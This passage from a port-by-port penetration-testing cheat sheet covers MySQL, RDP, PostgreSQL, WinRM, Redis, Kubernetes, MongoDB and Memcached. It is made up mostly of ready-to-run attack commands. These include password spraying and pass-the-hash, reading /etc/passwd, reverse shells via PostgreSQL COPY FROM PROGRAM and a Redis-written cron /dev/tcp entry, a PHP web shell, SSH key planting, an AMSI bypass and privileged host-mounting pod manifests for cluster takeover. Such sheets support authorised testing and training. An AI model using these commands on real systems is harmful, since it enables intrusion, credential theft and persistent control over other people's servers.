mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT USER();" |
| Check secure_file_priv |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW VARIABLES LIKE 'secure_file_priv';" |
| Read server file (LOAD_FILE) |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT LOAD_FILE('/etc/passwd');" |
| Enable LOCAL INFILE (client) |
mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> |
| Import CSV via LOCAL INFILE |
mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> -e "LOAD DATA LOCAL INFILE 'data.csv' INTO TABLE <db>.<table> FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES TERMINATED BY '\n';" |
mysqldump
| Action |
Command |
| Dump one database |
mysqldump -h <ip> -P 3306 -u <user> -p<password> <db> > dump.sql |
| Dump all databases |
mysqldump -h <ip> -P 3306 -u <user> -p<password> --all-databases > all.sql |
nmap (MySQL NSE)
| Action |
Command |
| Fingerprint and basic enum |
nmap -sV -p 3306 --script mysql-enum <ip> |
| Enumerate users (needs creds) |
nmap -p 3306 --script mysql-users --script-args mysqluser=<user>,mysqlpass=<pass> <ip> |
| Audit with policy file |
nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=<user>,mysql-audit.password=<pass>,mysql-audit.filename=/path/policy.nse <ip> |
Resources
3389 TCP – RDP
- Windows Remote Desktop Protocol. Prefer xfreerdp (actively maintained; supports NLA/TLS, clipboard/drive redirection). rdesktop is legacy and may fail against modern NLA setups.
nxc
- Credential validation against RDP/NLA without opening a GUI session (use
xfreerdp for interactive access).
| Action |
Command |
| Check login (password spray) |
nxc rdp <target_or_cidr> -u <user_or_list> -p '<pass_or_list>' |
| Domain auth |
nxc rdp <ip> -d <domain> -u <user> -p '<pass>' |
| Pass-the-hash |
nxc rdp <ip> -u <user> -H <NTHASH> |
| Kerberos (ccache) |
nxc rdp <fqdn> -k |
| Non-default port |
nxc rdp <ip> --port <port> -u <user> -p '<pass>' |
| Show NLA status in host banner |
nxc rdp <target> -u <user> -p '<password>' |
| Prove NLA disabled (unauth screenshot of login UI) |
nxc rdp <target> --nla-screenshot |
| Capture desktop after auth (evidence) |
nxc rdp <target> -u <user> -p '<password>' --screenshot --screentime 10 |
| Sweep a range for NLA-off hosts (save screenshots) |
nxc rdp <cidr> --nla-screenshot --res 1280x720 |
xfreerdp
- rdp client
- preferred over rdesktop.
Install xfreerdp v2sudo apt-get install -y freerdp2-x11
Install xfreerdp v3sudo apt-get install -y freerdp3-x11
| Action |
Command |
| Connect |
xfreerdp /v:<ip>:3389 /u:<user> /p:'<pass>' /cert:ignore |
| Domain auth |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /d:<domain> /cert:ignore |
| Fullscreen |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /f |
| Dynamic resolution |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /dynamic-resolution |
| Map local folder |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /drive:loot,<local_path> |
| Enable clipboard |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' +clipboard |
| Force TLS (no NLA) |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:tls /cert:ignore |
| Force Standard RDP (legacy) |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:rdp |
rdesktop
| Action |
Command |
| Connect |
rdesktop -u <user> -p '<pass>' <ip> |
| Domain auth |
rdesktop -u <user> -p '<pass>' -d <domain> <ip> |
| Fullscreen |
rdesktop -f -u <user> -p '<pass>' <ip> |
| Set resolution |
rdesktop -g 1920x1080 -u <user> -p '<pass>' <ip> |
| Map local folder |
rdesktop -r disk:loot=<local_path> -u <user> -p '<pass>' <ip> |
3690 TCP - SVN
svn
| Action |
Command |
| List repository contents |
svn list svn://<ip> |
| Checkout working copy |
svn checkout svn://<ip> |
| Show commit history |
svn log |
| Update to a specific revision |
svn update -r <revision> |
5432 TCP - Postgresql
Commands
| Action |
Command |
| Connect to database |
psql -h <ip> -U <user> -d <db>
psql postgresql://<username>:<password>@<host> |
| List databases |
\list |
| Use/switch database |
\c <db> |
| List tables |
\d |
| Get user roles (verbose) |
\du+ |
| Check if current user is superuser |
SELECT rolsuper FROM pg_roles WHERE rolname = current_user; |
| Browse server directory |
SELECT pg_ls_dir('./'); |
| List /etc directory |
SELECT pg_ls_dir('/etc'); |
| Read server file contents |
SELECT pg_read_file('/etc/passwd', 0, 100000); |
| Copy file contents into table |
CREATE TABLE <table>(content text); COPY <table> FROM '/path/to/file'; SELECT * FROM <table>; |
| Copy file into TEMP table (alt) |
CREATE TEMP TABLE <table>(content text); COPY <table> FROM $$C:\\path\\file.txt$$; SELECT content FROM <table>; DROP TABLE <table>; |
| Dump table to server file |
COPY <table> TO '/path/to/file.txt'; |
| Write literal text to file |
COPY (SELECT $$<text>$$) TO '/path/to/file.txt'; |
| Base64 decode → file (bytes) |
COPY (SELECT decode($$dGVzdGluZzEyMw==$$, $$base64$$)) TO $$C:\\test.bin$$; |
| Base64 decode → UTF-8 text file |
COPY (SELECT convert_from(decode($$dGVzdGluZzEyMw==$$, $$base64$$), $$utf-8$$)) TO $$C:\\test.txt$$; |
Attack Paths
Code Execution — C UDF/DLL
- Load a native library and expose an exported C symbol as a SQL function, then call it.
- Prereqs: Superuser (or equivalent), server account can read the library file, correct bitness (x64 vs x86).
- Paths: Absolute paths work; otherwise the file must be in
dynamic_library_path.
RCE — COPY ... PROGRAM (built-in, privilege-gated)
- Built-in PostgreSQL feature, not an exploit. If you have superuser (or role
pg_execute_server_program), the server can run OS commands and pipe stdout into a table.
- Minimal footprint: use a TEMP table so artifacts drop at session end.
| Action |
Command |
| Verify privilege |
SELECT current_user, rolsuper FROM pg_roles WHERE rolname = current_user; |
| Create temp results table |
CREATE TEMP TABLE cmd_exec(cmd_output text) ON COMMIT DROP; |
| PoC (Linux) |
COPY cmd_exec FROM PROGRAM 'whoami'; |
| PoC (Windows) |
COPY cmd_exec FROM PROGRAM 'cmd.exe /c whoami'; |
| Read output |
SELECT * FROM cmd_exec; |
| Reverse shell (Linux, if nc present) |
COPY cmd_exec FROM PROGRAM 'nc -n <ip> <port> -e /bin/bash'; |
| Download file (Linux) |
COPY cmd_exec FROM PROGRAM 'curl -s -o /tmp/payload http://<ip>/payload'; |
| Download file (Windows) |
COPY cmd_exec FROM PROGRAM "powershell -NoP -W Hidden -C \"iwr http://<ip>/payload -OutFile C:\\Windows\\Temp\\payload.exe\"" |
Commands run on the DB host as the PostgreSQL service account; no interactive prompts.
- Managed/cloud PostgreSQL often disables PROGRAM. Use absolute paths if PATH is constrained.
5985 TCP – WinRM
- Windows Remote Management (WS-Management over HTTP). Enables remote command execution and PowerShell remoting. Default auth is Negotiate (Kerberos/NTLM) with message-level encryption; Basic over HTTP indicates weak configuration. Prefer 5986/HTTPS in production.
curl
| Action |
Command |
| Fingerprint endpoint (401 expected) |
curl -sI http://<ip>:5985/wsman |
| Check auth methods |
curl -sI http://<ip>:5985/wsman | grep -i 'www-authenticate' |
nmap
| Action |
Command |
| Nmap WinRM probe |
nmap -p 5985 --script http-windows-remote-management <ip> |
nxc
| Action |
Command |
| Validate creds / spray |
nxc winrm <target_or_cidr> -u <user_or_list> -p '<pass_or_list>' |
| Domain auth |
nxc winrm <ip> -d <domain> -u <user> -p '<pass>' |
| Kerberos (ccache) |
nxc winrm <fqdn> -k |
| Pass-the-hash |
nxc winrm <ip> -u <user> -H <NTHASH> |
| Run CMD |
nxc winrm <ip> -u <user> -p '<pass>' -x "whoami /all" |
| Run PowerShell |
nxc winrm <ip> -u <user> -p '<pass>' -X "Get-LocalUser" |
evil-winrm (interactive)
| Action |
Command |
| Shell (HTTP) |
evil-winrm -i <ip> -u <user> -p '<pass>' |
| Shell (HTTPS 5986) |
evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' |
| Shell with client cert (HTTPS) |
evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' -k <private_key> -c <certificate> |
| Show menu (in-session) |
menu |
| AMSI bypass (in-session) |
Bypass-4MSI |
| Run local EXE in-memory (in-session) |
Invoke-Binary <path_to_local_exe> |
| Upload file (in-session) |
upload <local_path> <remote_path> |
| Download file (in-session) |
download <remote_path> <local_path> |
Notes
- Basic over HTTP works only if the host is configured with
Basic=true and AllowUnencrypted=true; if so, flag as a high-risk misconfiguration. Prefer 5986/TLS.
- WinRM typically restricted to local Administrators; successful auth is strong lateral-movement evidence.
5986 TCP – WinRM (HTTPS)
- WinRM over TLS; same API as 5985 with transport encryption. Common issues: self-signed/expired certs, CN/SAN mismatch, Basic enabled.
See 5985 TCP – WinRM
6379 TCP – Redis
- Key store / value storage.
Attack Paths
Arbitrary File Write (CONFIG + SAVE) → Web shell / SSH key / Cron
- Primitive:
CONFIG SET dir <target_dir> → CONFIG SET dbfilename <file> → SET … → SAVE.
Web shell (PHP)
| Action |
Command |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir <web_root> |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename shell.php |
| Write PHP payload to key |
redis-cli -h <ip> SET test "<?php system($_REQUEST['cmd']); ?>" |
| Persist to disk |
redis-cli -h <ip> SAVE |
SSH authorized_keys
| Action |
Command |
| Stage public key locally |
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt |
| Upload staged key into Redis |
cat foo.txt | redis-cli -h <ip> -x SET crackit |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir <writable_home_dir> |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename authorized_keys |
| Persist to disk |
redis-cli -h <ip> SAVE |
Cron reverse shell
| Action |
Command |
| Clear DB (optional) |
redis-cli -h <ip> FLUSHALL |
| Stage crontab entry key |
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1\n\n" | redis-cli -h <ip> -x SET 1 |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir /var/spool/cron/ |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename root |
| Persist to disk |
redis-cli -h <ip> SAVE |
Module-Based RCE
| Action |
Command |
| Load module |
redis-cli -h <ip> MODULE LOAD <path_to_module> |
| Execute command |
redis-cli -h <ip> sys.exec "whoami" |
| Reverse shell |
redis-cli -h <ip> sys.rev <ip> <port> |
Rogue Replication → Module-Based RCE (Automated)
| Action |
Command |
| Metasploit (unauth) |
msfconsole -q -x "use exploit/linux/redis/redis_unauth_exec; set RHOSTS <ip>; set RPORT 6379; run; exit" |
| Metasploit (auth) |
msfconsole -q -x "use exploit/linux/redis/redis_replication_cmd_exec; set RHOSTS <ip>; set RPORT 6379; set PASSWORD <password>; run; exit" |
| Build module (redis-rogue-getshell) |
cd RedisModulesSDK && make |
| Rogue master → exec cmd |
python3 redis-master.py -r <ip> -p 6379 -L <lhost> -P <lport> -f RedisModulesSDK/exp.so -c "id" |
redis-cli
| Action |
Command |
| Get Redis info / test if authentication is required |
INFO |
| Login with credentials |
AUTH <password>
AUTH <username> <password> |
| Get configuration file contents |
CONFIG GET * |
| Show connected clients |
CLIENT LIST |
| Show keys |
KEYS * |
| Get keys from database |
SELECT <db_number_from_#Keyspace_in_INFO>
KEYS *
GET <key> |
nmap (NSE)
| Action |
Command |
| Enumerate server info |
nmap -p 6379 --script redis-info <ip> |
| Brute-force AUTH |
nmap -p 6379 --script redis-brute <ip> |
6667 TCP – IRC
- Internet Relay Chat (plaintext).
hexchat
nmap
| Action |
Command |
| Enumerate server/version |
nmap -sV -p 6667 --script irc-info <ip> |
nc
| Action |
Command |
| Connect (plaintext) |
nc -v <ip> 6667 |
6697 TCP – IRC (HTTPS/TLS)
- IRC over TLS/SSL (encrypted).
hexchat
- GUI IRC client; enable SSL/TLS for the server entry.
openssl
| Action |
Command |
| TLS connect (test cert/handshake) |
openssl s_client -connect <ip>:6697 -servername <host> |
nmap
| Action |
Command |
| Enumerate server/version |
nmap -sV -p 6697 --script irc-info <ip> |
8530 TCP - Windows Server Update Services / WSUS (HTTP)
- Vulnerable to CVE-2025-59287
8531 TCP - Windows Server Update Services / (HTTPS)
10250 TCP - Kubelete
View running podskubeletctl -s <node ip> pods
Get a shell on a podkubeletctl exec /bin/sh -p <pod name> -n <namespace> -c <container name> -s <node ip>
8443 Kubernetes API
Run a commandkubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 <command>
- Token and ca.crt come from pod directory
- /run/secrets/kubernetes.io/serviceaccount
- Token must be exported to an environment variable for it to work (unconfirmed)
Get list of podskubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 get pods
List Permissionskubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 auth can-i --list
If permission to create a pod, then create one with host file system mounted inside
https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/
noderoot.ymlapiVersion: v1
kind: Pod
metadata:
name: noderootpod
labels:
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: noderootpod
image: busybox (or another valid known image, i.e. pick one from another pre-existing pod)
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
- Create the new node: kubectl create -f noderoot.yml
- Get a shell on the new node: kubectl exec -it noderootpod chroot /host
- If unable to exec on new pod using kubectl, then try kubeletctl to access the new pod
- In order to gain root on all nodes in a cluster use a DaemonSet instead:
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: noderootpod
labels:
spec:
selector:
matchLabels:
name: noderootdaemon
template:
metadata:
labels:
name: noderootdaemon
spec:
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: noderootpod
image: busybox (or another valid known image, i.e. pick one from another pre-existing pod)
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
Get a shell on a podkubectl exec -it <chosen pod from "kubectl get po" output> chroot /host
If unable to exec on new pod using kubectl, then try kubeletctl to access the new pod
27017 TCP – MongoDB
Commands
| Action |
Command |
| Connect to DB |
mongo -u <username> -p <password> <database> |
| Show collections |
show collections |
| Search for objects in a collection |
db.<collection>.find() |
| Add object to collection |
db.tasks.insert({"cmd":"<bash command>"}) |
11211 TCP – Memcached
- Caches information for database-backed websites to speed up performance.
nc
| Action |
Command |
| Connect |
nc -v <ip> 11211 |
telnet
| Action |
Command |
| Connect |
telnet <ip> 11211 |
Commands
| Action |
Command |
| Get version |
version |
| Get status |
stats |
| Get slabs |
stats slabs |
| Retrieve items list / slab items info |
stats items |
| Dump cached items from a slab (0 = unlimited lines) |
stats cachedump <slab_id> 0 |
Tip: stats items shows lines like STAT items:<#>:age ...; use that <#> as <slab_id> in stats cachedump.